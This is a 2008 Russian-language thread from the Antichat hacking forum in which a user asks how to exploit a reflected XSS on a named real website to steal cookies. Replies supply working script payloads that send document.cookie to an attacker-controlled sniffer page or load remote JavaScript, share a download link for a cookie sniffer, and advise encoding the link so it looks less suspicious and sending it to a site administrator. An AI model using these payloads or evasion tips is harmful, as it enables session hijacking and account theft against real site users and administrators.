ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Пассивная ХСС
  #1  
Старый 12.12.2008, 19:56
Аватар для Arigona
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278

Репутация: 114
По умолчанию Пассивная ХСС

Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )

1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?

Заранее спасибо за ваши ответы.
 
Ответить с цитированием

  #2  
Старый 12.12.2008, 20:02
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Дать тому, у кого хочешь свистнуть куки, такую ссылку:

/open.php?url='<script>window.location.href='http://твой_сайт/s.php?'+document.cookie;</script>

где s.php - твой снифер
 
Ответить с цитированием

  #3  
Старый 12.12.2008, 20:03
Аватар для [Dezzter]
[Dezzter]
Участник форума
Регистрация: 26.11.2007
Сообщений: 266
Провел на форуме:
3412198

Репутация: 341
По умолчанию

мда, почитай статьи по xss и вопросы пропадут сами собой, всё просто, любой поймёт
 
Ответить с цитированием

  #4  
Старый 12.12.2008, 20:05
Аватар для preda1or
preda1or
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545

Репутация: 242
Отправить сообщение для preda1or с помощью ICQ
По умолчанию

вот тебе мой снифер, может отправлять на почту, а может писать в файл. определяет некоторую инфу о юзере.
http://depositfiles.com/files/d3gf1m5m9

p.s. лучше написать свой ява скрипт, и залить на свой сервер с снифером, ссылка будет лучше
/open.php?url='<script src='http://www.blabla.ru/a.js'></script>

Последний раз редактировалось preda1or; 12.12.2008 в 20:08..
 
Ответить с цитированием

  #5  
Старый 12.12.2008, 20:38
Аватар для Arigona
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278

Репутация: 114
По умолчанию

Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.
 
Ответить с цитированием

  #6  
Старый 12.12.2008, 20:45
Аватар для +BemepoK+
+BemepoK+
Познающий
Регистрация: 06.12.2008
Сообщений: 33
Провел на форуме:
75860

Репутация: 16
По умолчанию

Цитата:
Сообщение от Arigona  
Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )

1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?

Заранее спасибо за ваши ответы.
Возможно при условии, что юзер (админ) окажется лохом и кликнет по ссылке, которую ты ему пришлешь. Только ссылку, которую тебе дал Pashkela запиши в hex или криптани, а то так палевно слишком.
Цитата:
Сообщение от Arigona  
Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.
Это либо активка была

Последний раз редактировалось +BemepoK+; 12.12.2008 в 20:48..
 
Ответить с цитированием

  #7  
Старый 12.12.2008, 20:50
Аватар для Arigona
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278

Репутация: 114
По умолчанию

Вот есть просто на сайте хсс пассивная вроде, http://freetmd.net/redir.php?url='><script>alert(/xak/)</script>

Как тут куки своровать?( Просто тестировал над собой, и куки не присылалисЬ, присылалась только инфа а куки нет.
 
Ответить с цитированием

  #8  
Старый 12.12.2008, 20:56
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Что значит "как"? Посты в теме читал вообще?
 
Ответить с цитированием

  #9  
Старый 12.12.2008, 20:59
Аватар для Arigona
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
Провел на форуме:
504278

Репутация: 114
По умолчанию

Pashkela, читал. Прочитай мой последний пост '' повнимательней '' пожалуйста.
 
Ответить с цитированием

  #10  
Старый 12.12.2008, 21:07
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

"Просто тестировал над собой"

и что? Это должно мне о чем-то сказать? Например о том, что ты вообще понятие имеешь что такое снифер? И умеешь им ПРАВИЛЬНО пользоваться?

Вот правильный снифер, которым, например, пользуюсь давно уже:

Скачать снифер
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Помогите пожалуйста с хсс тестером литлламера OMOH_PA E-Mail 5 07.02.2007 00:06
Количество алертов в хсс freddi Уязвимости 13 02.02.2007 23:42



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ